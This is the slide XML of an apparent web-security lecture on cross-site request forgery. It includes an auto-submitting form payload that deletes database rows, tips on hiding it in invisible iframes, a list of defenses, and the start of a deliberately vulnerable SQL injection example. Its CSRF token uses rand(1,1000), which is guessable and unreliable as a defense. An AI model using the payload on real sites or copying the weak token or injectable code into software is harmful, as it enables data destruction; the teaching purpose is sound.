          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>ETC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-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70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Cross-site request forgery attack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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Cross-site request forgery (CSRF): Trick user's browser into trashing your site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Very complex but important attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Very hard to defend against</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>I'd guess that nearly every site on the web is susceptible to this attack, at some level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-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64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How CSRF works</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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760" y="2398712"/>
            <a:ext cx="6908938" cy="425870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24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Key points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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>User has to already be logged into your site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>For example, as a site administrator who is allowed by your site to insert/delete DB data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>User has to access another site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>The other site has to have a way of telling the browser to send commands to your site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-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25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"Send commands to your site"?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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>Sure, the other server just has to send back…</a:t>
            </a:r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&lt;form id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>badform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" method="post" action="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yourserver.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dbdelete.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;input type="text" name="id" value="100"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;$("#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>badform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>").get(0).submit();&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-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9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What happens then…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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>The browser reads the FORM and SCRIPT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It executes the JS, automatically submitting the form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The browser posts the data to your web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP/JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>probably checks that the user is logged in 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dirty="0"/>
              <a:t>Yup… the session cookie took care of that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And then your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP/JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>acts on the command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dirty="0"/>
              <a:t>In this case, to delete some data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-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60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worse: Making the attack invisible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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Instead of outputting the form and JS directly, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0" smtClean="0"/>
              <a:t>output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>a 1 pixel x 1 pixel IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>And then output the form and the JS inside the IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>The user will never notice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-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83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Even worse: Damaging lots of data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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>Instead of outputting just one IFRAME, output a bunch of IFRAMES, each containing a form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Then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>autosubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> all of the IFRAMES one after another… trash the entire database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dirty="0"/>
              <a:t>Major integrity fail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(In fact, the FORM and IFRAME tags even have attributes that would make it possible to do this by reusing one IFRAME)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-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1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Even worse: Combine with XSS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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Instead of outputting a FORM that submits a relatively harmless data-deletion command, instead tell the browser to send evil data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>E.g., SCRIPT tag as shown in the previous lecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>And if your site doesn't protect against cross-site scripting (again, see previous lecture), then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" i="1" dirty="0"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t> users can be attacked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="x-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7897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Structure of an injection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altLang="en-US" dirty="0"/>
              <a:t>Receive data from outside your system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>User, another server, … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>anything</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> you don’t control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Your system stores the data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Variable, session, database, file, … anywhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Your system uses the data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Print on web page, insert into SQL, … anything, without taking precautions against evil data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Evil events transpire…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23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Preventing CSRF is a huge pain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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Reduces but does not eliminate the risk:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Use very short sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Always check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Options for eliminating the risk:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Require a custom http header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Create a special token that must be present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="x-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356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Option #1: Use very short sessions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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>There is a tradeoff:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>You can use long sessions: Increased usability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Users don't get logged of automatically if they step away for coffee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>You can use short sessions: Increased security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Session cookies time out fast, so they have to be stolen fast if they are going to be of any use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Therefore, the users are only susceptible to CSRF for a short amount of time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="x-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66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Option #2: Always check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0" err="1"/>
              <a:t>referer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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Most (not all) versions of most browsers send an http header that tells what page the user is looking at when an http request is initiated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>HTTP_REFERER is like "Content-Type"… it is just another header sent by the browser to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="x-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44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Option #2: Always check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0" err="1"/>
              <a:t>referer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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>So when the form is posted back to your site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>	$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t> = $_SERVER['HTTP_REFERER'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>	if ($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t> !== the CORRECT value for your site)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>		refuse to do anything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t> should be a page on your site, NOT a page on somebody else's site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23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Option #2: Always check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0" err="1"/>
              <a:t>referer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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Why this theoretically should work…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Operations initiated by your page will have a REFERER header that matches your site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Operations initiated by some other server's pages will have a REFERER header that matches their site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Not a very good defense against CSRF, sadly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>Browsers can be configured in insecure ways that make this method unreliable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11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#3: Require a custom http header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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>You can send a custom header of your own!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In your JS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>$.ajax({</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>:"http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>myserver.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>dbpage.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>data:{a:1,b:2,c:3,etc:5},</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>success:fnSuccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>beforeSend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: function(request) { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>request.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>("MYHEADER", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>itslegit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>}});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In your PHP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>if ($_SERVER["HTTP_MYHEADER"] != "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>itslegit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>") </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	refuse to do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>anything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73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#3: Require a custom http header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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>Why this works…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dirty="0"/>
              <a:t>Operations initiated by your page will have that special header present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dirty="0"/>
              <a:t>Operations initiated by some other server's pages will not have that special header present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This approach apparently works quite reliably… but ALL your non-idempotent operations need to be done via AJAX.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34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#4: Create a special token that must be present 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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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1500" dirty="0"/>
              <a:t>When you output a form, generate a random number and put a copy in the session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>	&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> $_SESSION["x"] = rand(1,1000) ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>	&lt;form …&gt;…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>	&lt;input type="hidden" name="x" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>			value="&lt;?= $_SESSION["x"]?&gt;"&gt;…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>	&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>And when the form is posted, check that the right value is sent back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>	if ($_REQUEST["x"] !== $_SESSION["x"])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>		refuse to do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>anything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr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63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#4: Create a special token that must be present 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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>Why this works…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dirty="0"/>
              <a:t>Operations initiated by your site will have that special token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dirty="0"/>
              <a:t>Operations initiated by some other server's pages will not have that special token </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(It's random, so it's hard to guess)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This approach also works reliably, but ALL your non-idempotent operations need to be protected like this.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904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Summary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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>Cross-site request forgery (CSRF) is dangerous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dirty="0"/>
              <a:t>Can trick users' browsers into trashing your data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dirty="0"/>
              <a:t>Can be combined with cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two solutions are not totally reliable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dirty="0"/>
              <a:t>Short sessions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dirty="0"/>
              <a:t>Checking the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two solutions are a pain to implement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dirty="0"/>
              <a:t>Perform all non-idempotent operations with AJAX, set and set custom header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dirty="0"/>
              <a:t>Perform all non-idempotent operations with a form containing a secret random token that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>check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03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SQL injection attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0"/>
              <a:t>DO NOT COPY-PASTE THIS CODE</a:t>
            </a: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sz="2800" dirty="0" err="1"/>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>("update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mytable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mycolumn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>'”+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
